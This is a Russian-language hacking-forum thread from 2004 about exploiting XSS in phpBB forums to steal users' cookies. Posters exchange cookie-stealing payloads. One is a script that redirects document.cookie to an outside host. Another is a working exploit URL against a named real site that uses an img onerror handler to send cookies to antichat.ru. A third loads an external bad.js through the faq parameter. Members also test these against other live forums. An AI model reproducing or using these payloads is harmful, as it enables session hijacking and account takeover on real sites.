Кто рубит в xss!

Discussion in 'Уязвимости' started by virgoz, 30 Oct 2004.

  1. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script&gt;document.location=&quot;www.asd.as/as.php?xack=&quot;+document.cookie&lt;/script&gt;, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script&gt;document.location&amp;#61&amp;#34www.asd.as/as.php?xack&amp;#61&amp;#34&amp;#43document.cookie&lt;/script&gt;, то строка выполняется только до &quot;<script&gt;document.location=&quot; и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
    PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?
     
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Я что-то не понял, каким образом ты вставляешь этот скрипт в форум ?
     
  3. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Вот так работает

    http://www.spb-mebel.ru/phpbb/faq.php?faq[0][0]=te):<img src="" sss=http://antichat.ru/cgi-bin/s.jpg? onerror=document.location=this.sss%2Bdocument.cookie>st&amp;faq[0][1]=test
     
    #4 Algol, 31 Oct 2004
    Last edited: 30 Nov 2004
  5. CoTT

    CoTT Banned

    Joined:
    16 Sep 2004
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    а в каких версиях PHPbb это работает?
    вот тут: www.rimspb.ru/forum/ например не пашет...
     
  6. Pengo

    Pengo New Member

    Joined:
    13 Sep 2004
    Messages:
    34
    Likes Received:
    0
    Reputations:
    0
  7. PEPSICOLA

    PEPSICOLA . . . . . 2L . . . . .

    Joined:
    14 Oct 2004
    Messages:
    1,025
    Likes Received:
    823
    Reputations:
    368
    Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))
     
  8. ля-ля

    ля-ля New Member

    Joined:
    23 Aug 2004
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    А при чём тут он?????? :confused: :D
     
  9. PEPSICOLA

    PEPSICOLA . . . . . 2L . . . . .

    Joined:
    14 Oct 2004
    Messages:
    1,025
    Likes Received:
    823
    Reputations:
    368
    Мне его так не хватает... :( ... :D
     
  10. TaskFall

    TaskFall New Member

    Joined:
    24 Dec 2004
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Я тоже с этим мучился - без кавычек - кукисы не спереть =(
    я решил это так:
    Просто выполнялся скрипт не из url'а, а из файла faq[0][0]=<script src=\localhost/bad.js></script>